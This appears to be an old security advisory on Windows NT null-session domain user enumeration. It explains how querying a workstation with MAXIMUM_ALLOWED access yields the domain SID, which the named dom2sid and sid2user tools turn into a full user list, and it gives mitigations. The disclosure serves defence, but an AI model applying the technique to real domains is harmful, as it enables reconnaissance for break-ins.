COMMAND

    kernel

SYSTEMS AFFECTED

    WinNT

PROBLEM

    Pascal Longpre found following.  It is possible to list the  whole
    user list of a domain by querying any workstation on that  domain.
    Even if the domain controller  is hidden behind a firewall  or has
    IP  filtering  enabled,  the  list  comes out gracefully since the
    workstation  forwards  the  query  for  you.  Pascal suspects that
    this may even work on  a workstation connected to it's  DC through
    a VPN (not tested yet).

    The idea is to  get the workstation to  spit it's domain SID  with
    the LsaQueryInformationPolicy() function.  Normally, that function
    would require the  "GENERIC_READ | GENERIC_EXECUTE"  access rights
    in order to  work but Pascal  discovered that by  simply using the
    "MAXIMUM_ALLOWED" access right it works through the good old  null
    session.

    Pascal wrote a small program called "dom2sid" demonstrating  this.
    It should be available  shortly on the www.securityfocus.com  free
    tools list.   It returns the  computer/domain names and  SIDs. You
    can then feed this to the popular sid2user tool and get the  whole
    user list.If both SIDs are equal, you found a DC.

    Dom2sid is now available at Security Focus at:

        http://www.securityfocus.com/level2/?go=tools&id=1239

    Also, sid2user and user2sid are available at:

        http://www.securityfocus.com/level2/?go=tools&id=544

SOLUTION

    The "restrict  anonymous" solution  provided by  Microsoft doesn't
    help here.  The only way to stop this behavior is to use a program
    called fixpol.exe.  Phil Brass, currently with ISS, wrote it.   It
    sets the DACL  on the LSA.   A very nice  piece of code.   You can
    also stop this particular method from functioning by upgrading  to
    Windows 2000,  and Windows  2000 also  has the  capability to  set
    RestrictAnonymous=2,  which  denies   null  sessions   completely.
    However, it isn't a  good idea to do  this to a domain  controller
    in a mixed domain.  Windows 2000 hands out a lot less  information
    to a null session than NT 4.0.

    The  real  solution  is  to  require  strong  passwords,  with   a
    reasonably short  change interval,  so that  even if  someone does
    get  your  user  list,  it  doesn't  get  them anywhere.  Also use
    some form  of port  filtering to  disallow access  to 137-139 from
    the  internet  (and  445  on  Windows  2000).  Black Ice is a nice
    product.